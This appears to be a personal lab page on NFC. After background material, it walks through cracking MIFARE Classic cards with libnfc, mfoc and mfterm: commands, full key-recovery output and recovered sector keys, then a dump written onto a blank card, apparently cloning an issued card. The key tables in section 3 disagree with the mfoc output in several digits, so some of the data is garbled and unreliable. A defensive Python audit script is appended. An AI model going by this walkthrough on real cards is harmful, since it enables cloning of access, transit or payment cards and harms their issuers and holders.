NFC Research

From Jack's Lab


1 Overview

NFC, Near Field Communication, is a short-range wireless communication technology. It allows contactless point-to-point data transfer between electronic devices, exchanging data within ten centimetres (3.9 inches).

The technology evolved from RFID and was developed jointly by Philips Semiconductors (now NXP Semiconductors), Nokia and Sony; it builds on RFID and interconnection technology.

Near field communication is a short-range, high-frequency radio technology that operates at 13.56 MHz within a distance of 20 cm. Three transfer rates are defined: 106 kbit/s, 212 kbit/s and 424 kbit/s.

NFC has been standardised as ISO/IEC IS 18092, ECMA-340 and ETSI TS 102 190.


NFC is backward compatible with RFID: it integrates a contactless reader, a contactless card and peer-to-peer functionality into a single chip. Put simply, NFC is an evolved version of RFID.



2 Devices

  • ACS ACR122U
Widely used NFC reader (USB interface)


  • Phones with NFC
Meizu MX3
Oppo Find 5
Xiaomi 2A, Xiaomi 3
SONY Xperia V LT25i
Samsung Galaxy Note 3, Galaxy Note 2, Galaxy Note, Galaxy S2, Galaxy S3, Galaxy S4
Nokia Lumia 720, Lumia 820, Lumia 920, as well as Lumia 925, Lumia 928 and Lumia 1020


  • proxmark3
http://proxmark3.com/



3 Operating modes

Card emulation mode: in this mode the device is effectively an IC card built on RFID technology. It can replace many of today's IC cards (including credit cards) for shopping payments, EasyCard-style transit cards, access control, tickets, admission passes and so on. The big advantage of this mode is that the card is powered by the RF field of the contactless reader, so it keeps working even when the host device (such as a phone) has no battery power.


Peer-to-peer mode (P2P mode): much like infrared, this mode is used for data exchange, but with a shorter range, faster connection setup, a higher transfer speed and lower power consumption (Bluetooth is similar). Linking two NFC-enabled devices allows point-to-point data transfer, for example downloading music, exchanging pictures or synchronising address books.


Reader/writer mode: the device acts as a contactless reader, for example reading the balance and transaction history of a municipal transit card, or reading information from electronic tags on posters or exhibition displays.



4 Decoding

Mifare 1 S50 (1K EEPROM) and Mifare 1 S70 (4K EEPROM) have long since been completely broken; the newest applications all use Mifare DESFire.


Hardware: ACR122U, around 200 RMB

Software: open-source tools

Key scanning: mfoc http://code.google.com/p/mfoc/
Brute-forcing the key of a single sector: mfcuk http://code.google.com/p/mfcuk/
Mifare Classic card helper tool: mfterm https://github.com/4ZM/mfterm
Core support library: libnfc http://code.google.com/p/libnfc/


1. Building

$ wget http://libnfc.googlecode.com/files/libnfc-1.7.0.tar.bz2
$ tar jxf libnfc-1.7.0.tar.bz2
$ cd libnfc-1.7.0
$ ./configure              # by default the ACR122U driver is acr122_usb, which talks to the reader directly over USB instead of going through the PC/SC middleware via the acr122_pcsc driver
$ make
$ sudo make install

$ wget http://mfoc.googlecode.com/files/mfoc-0.10.6.tar.gz && tar -xvzf mfoc-0.10.6.tar.gz
$ cd mfoc-0.10.6
$ ./configure
$ make
$ sudo make install

$ git clone git://github.com/4ZM/mfterm
$ cd mfterm
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

mfcuk builds the same way; if a library is missing during the build, install it.


2. Scanning keys


Confirm that the system detects the ACR122U:

$ nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
nfc-list: ERROR: Unable to open NFC device: acr122_usb:001:009

$ sudo nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
NFC device: ACS / ACR122U PICC Interface opened

It does not work inside a VMware virtual machine; you keep getting an "Unable to write USB interface" error.


Start scanning the keys of all sectors:

$ sudo mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  02  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 25  55  aa  10  
      SAK (SEL_RES): 18  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 4K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1
* SmartMX with MIFARE 4K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [/.......................................]
[Key: d3f7d3f7d3f7] -> [/.......................................]
[Key: 000000000000] -> [/.......................................]
[Key: b0b1b2b3b4b5] -> [/.......................................]
[Key: 4d3a99c351dd] -> [/.......................................]
[Key: 1a982c7e459a] -> [/.......................................]
[Key: aabbccddeeff] -> [/.......................................]
[Key: 714c5c886e97] -> [/.......................................]
[Key: 587ee5f9350f] -> [/.......................................]
[Key: a0478cc39091] -> [/.......................................]
[Key: 533cb6c723f6] -> [/.......................................]
[Key: 8fd0a4f256e9] -> [/.......................................]

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  UNKNOWN_KEY [B]  
Sector 01 -  UNKNOWN_KEY [A]  Sector 01 -  UNKNOWN_KEY [B]  
Sector 02 -  UNKNOWN_KEY [A]  Sector 02 -  UNKNOWN_KEY [B]  
Sector 03 -  UNKNOWN_KEY [A]  Sector 03 -  UNKNOWN_KEY [B]  
Sector 04 -  UNKNOWN_KEY [A]  Sector 04 -  UNKNOWN_KEY [B]  
Sector 05 -  UNKNOWN_KEY [A]  Sector 05 -  UNKNOWN_KEY [B]  
Sector 06 -  UNKNOWN_KEY [A]  Sector 06 -  UNKNOWN_KEY [B]  
Sector 07 -  UNKNOWN_KEY [A]  Sector 07 -  UNKNOWN_KEY [B]  
Sector 08 -  UNKNOWN_KEY [A]  Sector 08 -  UNKNOWN_KEY [B]  
Sector 09 -  UNKNOWN_KEY [A]  Sector 09 -  UNKNOWN_KEY [B]  
Sector 10 -  UNKNOWN_KEY [A]  Sector 10 -  UNKNOWN_KEY [B]  
Sector 11 -  UNKNOWN_KEY [A]  Sector 11 -  UNKNOWN_KEY [B]  
Sector 12 -  UNKNOWN_KEY [A]  Sector 12 -  UNKNOWN_KEY [B]  
Sector 13 -  UNKNOWN_KEY [A]  Sector 13 -  UNKNOWN_KEY [B]  
Sector 14 -  UNKNOWN_KEY [A]  Sector 14 -  UNKNOWN_KEY [B]  
Sector 15 -  UNKNOWN_KEY [A]  Sector 15 -  UNKNOWN_KEY [B]  
Sector 16 -  UNKNOWN_KEY [A]  Sector 16 -  UNKNOWN_KEY [B]  
Sector 17 -  UNKNOWN_KEY [A]  Sector 17 -  UNKNOWN_KEY [B]  
Sector 18 -  UNKNOWN_KEY [A]  Sector 18 -  UNKNOWN_KEY [B]  
Sector 19 -  UNKNOWN_KEY [A]  Sector 19 -  UNKNOWN_KEY [B]  
Sector 20 -  UNKNOWN_KEY [A]  Sector 20 -  UNKNOWN_KEY [B]  
Sector 21 -  UNKNOWN_KEY [A]  Sector 21 -  UNKNOWN_KEY [B]  
Sector 22 -  UNKNOWN_KEY [A]  Sector 22 -  UNKNOWN_KEY [B]  
Sector 23 -  UNKNOWN_KEY [A]  Sector 23 -  UNKNOWN_KEY [B]  
Sector 24 -  UNKNOWN_KEY [A]  Sector 24 -  UNKNOWN_KEY [B]  
Sector 25 -  UNKNOWN_KEY [A]  Sector 25 -  UNKNOWN_KEY [B]  
Sector 26 -  UNKNOWN_KEY [A]  Sector 26 -  UNKNOWN_KEY [B]  
Sector 27 -  UNKNOWN_KEY [A]  Sector 27 -  UNKNOWN_KEY [B]  
Sector 28 -  UNKNOWN_KEY [A]  Sector 28 -  UNKNOWN_KEY [B]  
Sector 29 -  UNKNOWN_KEY [A]  Sector 29 -  UNKNOWN_KEY [B]  
Sector 30 -  UNKNOWN_KEY [A]  Sector 30 -  UNKNOWN_KEY [B]  
Sector 31 -  UNKNOWN_KEY [A]  Sector 31 -  UNKNOWN_KEY [B]  
Sector 32 -  UNKNOWN_KEY [A]  Sector 32 -  UNKNOWN_KEY [B]  
Sector 33 -  UNKNOWN_KEY [A]  Sector 33 -  UNKNOWN_KEY [B]  
Sector 34 -  UNKNOWN_KEY [A]  Sector 34 -  UNKNOWN_KEY [B]  
Sector 35 -  UNKNOWN_KEY [A]  Sector 35 -  UNKNOWN_KEY [B]  
Sector 36 -  UNKNOWN_KEY [A]  Sector 36 -  UNKNOWN_KEY [B]  
Sector 37 -  UNKNOWN_KEY [A]  Sector 37 -  UNKNOWN_KEY [B]  
Sector 38 -  UNKNOWN_KEY [A]  Sector 38 -  UNKNOWN_KEY [B]  
Sector 39 -  UNKNOWN_KEY [A]  Sector 39 -  UNKNOWN_KEY [B]  


Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 15105 .....
Sector: 1, type A, probe 1, distance 15147 .....
Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 15147 .....
Found Key: A [c3a4fa8db109]
Sector: 3, type A, probe 0, distance 15147 .....
Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 15149 .....
Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 15151 .....
Found Key: A [5601f83644bb]
Sector: 6, type A, probe 0, distance 15149 .....
Sector: 6, type A, probe 1, distance 15149 .....
Sector: 6, type A, probe 2, distance 15149 .....
Found Key: A [20f2bf55ac1a]
Sector: 7, type A, probe 0, distance 15147 .....
Found Key: A [dd77fb8c3736]
Sector: 8, type A, probe 0, distance 15149 .....
Sector: 8, type A, probe 1, distance 15147 .....
Found Key: A [c2180972c580]
Sector: 9, type A, probe 0, distance 15151 .....
Found Key: A [742c582e8c04]
Sector: 10, type A, probe 0, distance 15151 .....
Sector: 10, type A, probe 1, distance 15193 .....
Sector: 10, type A, probe 2, distance 15151 .....
Found Key: A [db338f92bb98]
Sector: 11, type A, probe 0, distance 15151 .....
Found Key: A [15559907e873]
Sector: 12, type A, probe 0, distance 15151 .....
Found Key: A [c8313c454d2a]
Sector: 13, type A, probe 0, distance 15149 .....
Sector: 13, type A, probe 1, distance 15149 .....
Found Key: A [c896c22e5b3e]
Sector: 14, type A, probe 0, distance 15149 .....
Found Key: A [72558e3fe66c]
Sector: 15, type A, probe 0, distance 15151 .....
Found Key: A [aec383ce3c12]
......
......

When it finishes, the whole card's data is written to the file dump.card.file.


3. Reading again

Once the keys of all sectors have been scanned, reading again is much faster: load dump.card.file directly in mfterm, which extracts all the keys from it automatically, and subsequent reads and writes go quickly.

On an NFC-capable phone, the MifareClassicTool app can be used to read and write on the go, which is much more convenient.

comcat@jackslab:~$ mfterm
$ read
No key argument (A|B) given. Defaulting to A
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
Could not connect to any NFC device

comcat@jackslab:~$ sudo mfterm
$ help
    quit               Exit the program.
    load               Load tag data from a file.
    save               Save tag data to a file.
    clear              Clear the current tag data.
    read               A|B : Read tag data from a physical tag.
    read unlocked      On pirate cards, read card without keys.
    write              A|B : Write tag data to a physical tag.
    write unlocked     On pirate cards, write 1k tag with block 0.
    print              1k|4k : Print tag data.
    print keys         1k|4k : Print tag's keys.
    print ac           Print access conditions.
    set                #block #offset = xx xx xx : Set tag data.
    keys load          Load keys from a file.
    keys save          Save keys to a file.
    keys clear         Clear the keys.
    keys set           A|B #S key : Set a key value.
    keys import        Import keys from the current tag.
    keys test          Try to authenticate with the keys.
    keys               1k|4k : Print the keys.
    dict load          Load a dictionary key file.
    dict clear         Clear the key dictionary.
    dict attack        Find keys of a physical tag.
    dict               Print the key dictionary.
    spec load          Load a specification file.
    spec clear         Unload the specification.
    spec               Print the specification.
    mac key            <k0..k7> : Get or set MAC key.
    mac compute        #block : Compute block MAC.
    mac update         #block : Compute block MAC.
    mac validate       1k|4k : Validates block MAC of the whole tag.
$ read
No key argument (A|B) given. Defaulting to A
Connected to device, but no tag found.

$ keys load dump.card.file   # parse the whole dumped card data directly and load the keys
Successfully loaded keys from: dump.card.file

$ keys 
xS  xB  KeyA          KeyB
----------------------------------
00  03  c0c1c2c3c4c5  a1475c9ee325
01  07  2c5c3710d3c5  b40b2c0d47f1
02  0b  c1f4ff83b109  dc0fc2d4d8cc
03  0f  3c34515b11d4  b42fc69d3ccf
04  13  0725c08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274cc1d
06  1b  20f2bf55cc1c  8f5cd31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ec542967d
09  27  742c582e8c04  d43ec542967d
0a  2b  db338f92bb98  e92d77b9c1f2
0b  2f  15559907e873  4f94956dfce7
0c  33  c8313c454d2c  25860937cf4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  cded278592c2
0f  3f  cec383ce3c12  f1475c9ee325

$ keys test 4k A             # verify the keys

$ keys save /tmp/a
Successfully wrote keys to: /tmp/a

$ keys load /tmp/a
Successfully loaded keys from: /tmp/a

$ read                       # read all data on the card
No key argument (A|B) given. Defaulting to A
Reading: [.........0x13.0x12.0x11.0x10................] Auth errors in indicated sectors.
Read MIFARE Classic 4k (SAK: 18, ATQA: 00 02)

$ quit
comcat@jackslab:~$



5 Writing

# mfoc -P 500 -O blank.card.orig.dump
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
......
...... 

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  FOUND_KEY   [B]  
Sector 01 -  FOUND_KEY   [A]  Sector 01 -  FOUND_KEY   [B]  
Sector 02 -  FOUND_KEY   [A]  Sector 02 -  FOUND_KEY   [B]  
......
...... 

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00  00  00  00  00  00  ff  07  80  69  ff  ff  ff  ff  ff  ff  
Block 62, type A, key ffffffffffff :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
......
...... 


# nfc-mfclassic W a ykt20.dump blank.card.orig.dump f
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
Guessing size: seems to be a 1024-byte card
Sent bits:     50  00  57  cd  
Sent bits:     40 (7 bits)
unlock failure!

# nfc-mfclassic w a ykt20.dump blank.card.orig.dump 
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.

# mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [................]
[Key: a0a1a2a3a4a5] -> [/...............]
[Key: d3f7d3f7d3f7] -> [/...............]
[Key: 000000000000] -> [/...............]
......
......

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  UNKNOWN_KEY [B]  
Sector 01 -  UNKNOWN_KEY [A]  Sector 01 -  UNKNOWN_KEY [B]  
Sector 02 -  UNKNOWN_KEY [A]  Sector 02 -  UNKNOWN_KEY [B]  
......
......


Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 32 .....
Sector: 1, type A, probe 1, distance 32 .....
Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 32 .....
Sector: 2, type A, probe 1, distance 32 .....
Found Key: A [c1f4ff83b109]
Sector: 3, type A, probe 0, distance 32 .....
Sector: 3, type A, probe 1, distance 32 .....
Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 32 .....
Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 32 .....
Found Key: A [5601f83644bb]
......
......
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key aec383ce3c12 :00  00  00  00  00  00  7f  07  88  00  00  00  00  00  00  00  
Block 62, type A, key aec383ce3c12 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 61, type A, key aec383ce3c12 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
......
......

# mfterm
$ keys load dump.card.file 
Successfully loaded keys from: dump.card.file
$ keys
xS  xB  KeyA          KeyB
----------------------------------
00  03  a0a1a2a3a4a5  f1475c9ee325
01  07  2c5a3710d3a5  840b2a0d47f1
02  0b  c1f4ff83b109  dc0fa2d4d8aa
03  0f  3c34515b11d4  b42fa69d3acf
04  13  0725a08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274ca1d
06  1b  20f2bf55ac1a  8f5ad31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ea542967d
09  27  742c582e8c04  d43ea542967d
0a  2b  db338f92bb98  e92d77b9a1f2
0b  2f  15559907e873  4f94956dfae7
0c  33  c8313c454d2a  25860937af4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  aded278592c2
0f  3f  aec383ce3c12  f1475c9ee325

$ keys load ykt20.dump 
Successfully loaded keys from: ykt20.dump
$ keys 
xS  xB  KeyA          KeyB
----------------------------------
00  03  a0a1a2a3a4a5  f1475c9ee325
01  07  2c5a3710d3a5  840b2a0d47f1
02  0b  c1f4ff83b109  dc0fa2d4d8aa
03  0f  3c34515b11d4  b42fa69d3acf
04  13  0725a08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274ca1d
06  1b  20f2bf55ac1a  8f5ad31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ea542967d
09  27  742c582e8c04  d43ea542967d
0a  2b  db338f92bb98  e92d77b9a1f2
0b  2f  15559907e873  4f94956dfae7
0c  33  c8313c454d2a  25860937af4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  aded278592c2
0f  3f  aec383ce3c12  f1475c9ee325
$ read
No key argument (A|B) given. Defaulting to A
Reading: [................] Success!
Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04)
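The mfterm "keys load" step in section 3 pulls the keys out of the dump's sector trailers, and the "Block 63" lines in section 5 show those trailers raw (key A, access bytes, key B). As an added example that is not part of the original page, the following Python decodes such trailers from a raw dump: it assumes mfoc's binary layout (16-byte blocks, 64 for a 1K card, 256 for a 4K card, recovered keys stored in the trailers), checks the inverted copies of the access bits, flags default keys, and reports which trailer configurations let a reader holding only key A read key B. The sample dump and the DEFAULT_KEYS subset are constructed for the example.

```python
# Added example (not from the original page): audit the sector trailers of a raw
# MIFARE Classic dump as mfoc writes it (16-byte blocks, 64 for 1K, 256 for 4K,
# recovered keys stored in the trailers) for default keys and for access
# conditions under which key B can be read by anyone holding key A.
DEFAULT_KEYS = {"ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7",
                "000000000000", "b0b1b2b3b4b5", "aabbccddeeff"}  # part of mfoc's list

# Trailer access conditions keyed by C1C2C3 of block 3: "KeyA read/write,
# access-bits read/write, KeyB read/write"; A, B, AB = key needed, "-" = never.
TRAILER_AC = {
    0b000: "KeyA -/A  AC A/-  KeyB A/A", 0b010: "KeyA -/-  AC A/-  KeyB A/-",
    0b100: "KeyA -/B  AC AB/- KeyB -/B", 0b110: "KeyA -/-  AC AB/- KeyB -/-",
    0b001: "KeyA -/A  AC A/A  KeyB A/A",  # transport configuration (ff 07 80)
    0b011: "KeyA -/B  AC AB/B KeyB -/B",  # the issued card above (7f 07 88)
    0b101: "KeyA -/-  AC AB/B KeyB -/-", 0b111: "KeyA -/-  AC AB/- KeyB -/-",
}
KEY_B_READABLE_WITH_A = {0b000, 0b010, 0b001}

def trailer_block(sector):
    """Trailer block number; sectors 32-39 of a 4K card hold 16 blocks each."""
    return sector * 4 + 3 if sector < 32 else 128 + (sector - 32) * 16 + 15

def access_code(b6, b7, b8, block=3):
    """C1C2C3 of one block from access bytes 6-8; None if the inverted copies disagree."""
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    if not (c1 ^ (b6 & 0x0F) == 0x0F and c2 ^ (b6 >> 4) == 0x0F
            and c3 ^ (b7 & 0x0F) == 0x0F):
        return None
    return ((c1 >> block) & 1) << 2 | ((c2 >> block) & 1) << 1 | ((c3 >> block) & 1)

def audit_dump(data):
    """One dict per sector: keys, default-key flags, trailer access code and meaning."""
    report = []
    for s in range({1024: 16, 4096: 40}[len(data)]):
        t = data[trailer_block(s) * 16:trailer_block(s) * 16 + 16]
        key_a, key_b = t[:6].hex(), t[10:].hex()
        code = access_code(t[6], t[7], t[8])
        report.append({"sector": s, "keyA": key_a, "keyB": key_b,
                       "defaultA": key_a in DEFAULT_KEYS, "defaultB": key_b in DEFAULT_KEYS,
                       "code": code, "keyB_exposed": code in KEY_B_READABLE_WITH_A,
                       "ac": TRAILER_AC.get(code, "inconsistent access bits")})
    return report

# Constructed 1K dump: every trailer as on the blank card above (default keys,
# transport access bits), except sector 1, which gets the issued card's trailer.
SAMPLE = bytearray(1024)
for s in range(16):
    SAMPLE[trailer_block(s) * 16:trailer_block(s) * 16 + 16] = bytes.fromhex(
        "ffffffffffff" "ff078069" "ffffffffffff")
SAMPLE[7 * 16:8 * 16] = bytes.fromhex("2c5a3710d3a5" "7f078800" "840b2a0d47f1")
```

Running audit_dump on a real mfoc dump lists every sector still on a factory key and every sector whose trailer configuration leaks key B, which is the check to run on an issued card before trusting its key B as a separate secret.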